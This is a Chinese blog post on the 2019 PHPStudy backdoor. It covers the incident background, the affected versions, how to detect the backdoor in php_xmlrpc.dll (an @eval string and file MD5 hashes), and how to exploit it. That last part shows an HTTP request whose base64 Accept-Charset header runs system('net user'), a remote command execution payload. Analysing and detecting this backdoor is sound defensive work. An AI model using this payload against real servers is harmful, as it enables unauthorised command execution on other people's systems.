美文网首页
Phpstudy隐藏后门2019-09-24

Phpstudy隐藏后门2019-09-24

作者: 喵了个咪0 | 来源:发表于2019-11-29 15:02 被阅读0次

1.事件背景

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户

9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章,文章里说明phpstudy存在“后门”

2.影响版本

软件作者声明phpstudy 2016版PHP5.4存在后门。

实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门

3.后门检测方法

通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中

phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45

phpStudy2016

路径

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018

路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

用记事本打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在

附后门文件MD5值:

MD5: 0F7AD38E7A9857523DFBCE4BCE43A9E9

MD5: C339482FD2B233FB0A555B629C0EA5D5

4. 后门利用手法

 将含有后门的phpstudy 运行起来 然后访问网站

访问目标站点

抓取访问包 修改请求包内容 直接触发远程命令执行

Accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

Accept-Encoding: gzip,deflate

ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 base64加密的 解密后  echo system("net user");

添加 远程命令 触发后门

相关文章

  • Phpstudy隐藏后门2019-09-24

    1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、My...

  • phpstudy后门复现

    ps:当时出的时候就复现了,但是由于种种原因(当初粗心,没好好留意)没有成功,今天终于成功了 目前已知受影响的ph...

  • phpstudy后门验证方式

    GET / HTTP/1.1 Host: 0.0.0.0 User-Agent: Mozilla/5.0 (Win...

  • phpstudy后门漏洞复现

    phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP...

  • phpstudy后门利用方式

    随意访问任何一个文件 0x01 Accept-Encoding字段中,gzip和deflate之间的逗号后的空格去...

  • PHPStudy后门利用方法

    漏洞版本Phpstudy 2016版 php-5.4Phpstudy 2018版 php-5.2.17Phps...

  • phpstudy后门分析与复现

    小白白也要复现! phpstudy简介 phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apa...

  • phpStudy漏洞复现

    漏洞简介 关于phpStudy的后门漏洞可参考https://blog.csdn.net/weixin_43886...

  • CSRF+表单自动提交

    下载bWAPP这个实验环境,这个是使用php的环境用phpstudy就能很简单的搭建了(其他的版本有后门,还请用新...

  • 打印每隔5分钟的时间

    '2019-09-24 05:00'到'2019-09-24 19:00"打印出每隔5分钟的时间 打印出来:

网友评论

      本文标题:Phpstudy隐藏后门2019-09-24

      本文链接:https://www.haomeiwen.com/subject/eyabuctx.html